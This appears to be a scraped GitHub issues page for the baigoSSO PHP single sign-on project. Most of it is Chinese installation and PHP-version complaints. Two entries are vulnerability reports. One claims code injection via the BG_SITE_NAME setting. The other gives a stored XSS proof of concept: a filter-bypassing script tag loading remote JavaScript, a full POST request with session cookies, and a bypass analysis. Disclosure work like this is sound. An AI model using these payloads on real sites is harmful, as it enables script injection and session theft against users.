baigostudio / baigosso Goto Github PK

解压放到根目录，访问http://xxx.com/install/

数据库名错误！

您设置的数据库名错误，可能是数据库名错误或者是设置的用户名没有该数据库的权限，详情请咨询数据库服务器提供商。在得到正确的数据库信息后，请重新安装本系统。

如需重新安装，请执行如下步骤：
删除 ./config/is_install.php 文件
重新运行 ./install/ctl.php

环境 PHP5.5.25 ＋ Nginx ＋ Mysql 5.5

There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into 'opt_base.inc.php'.

The content of 'opt_base.inc.php' are:

什么时候可以支持php7

提交数据库信息提示

$path = strtolower($path);

在Windows环境下安装正常，在Linux下(宝塔面板)始终令牌错误和验证码错误

最后找到了解决办法，看了一遍源码发现他的Session是存在文件里面的，而且还是runtime

目前发现他不会自己创建runtime，所以手动创建一个就好了

安装到数据库时，无法创建表

你好， user_contact 等多个字段设置了NOT NULL，会导致在安装的时候 “创建管理员” 步骤会失败

https://github.com/baigoStudio/baigoSSO/blob/master/core/model/user.class.php#L40

下载安装好了程序，环境为CENTOS7.2，LAMP，环境安装没问题，数据库连接，PHP都完全正常，但是在baigo_sso的数据库连接验证那里一直过不去，错误：数据库未正确设置 x030404，实现不知道哪里还有问题了~~~~

支持标准的SSO协议吗? CAS, SAML, OAUTH2,OIDC?

https://blog.csdn.net/BeiShangBuZaiLai/article/details/102930078

为了安装SSO。我花了一上午时间，最后发现，竟然不支持PHP7.1，我想问一下，啥时候可以支持PHP7.1啊。

Fatal error: Cannot unset $this in /ginkgo/core/captcha.class.php on line 256

Vulnerability description

A xss vulnerability was discovered in baigoCMS.
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the
/public/console/profile/info-submit/

POC:

xss payload:<sCRiPt/SrC=//your js>

POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa

__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E

Submit this form, after refreshing, you can find that our xss statement was successfully executed.

Vulnerability Analysis

Filename:app/ctrl/console/profile.ctrl.php function:infoSubmit Line 70 ，It filters the content on the input.


Continue to follow up on this process

Because the incoming argument is an array, it will go into the fillParam method of line 352.


In the 826 line, enter the safe function to filter the input content.


Filtering the input content by xss and sql injection.But we can bypass this.
payload:

<sCRiPt/SrC=//js>

//define('BG_URL_ROOT', str_ireplace(DS, '/', str_ireplace($_SERVER['DOCUMENT_ROOT'], '', BG_PATH_ROOT))); 这个在win下报错
define('BG_URL_ROOT', '/');

config 目录 config.inc.sample.php, runtime.php 都没有，运行安装提示错误。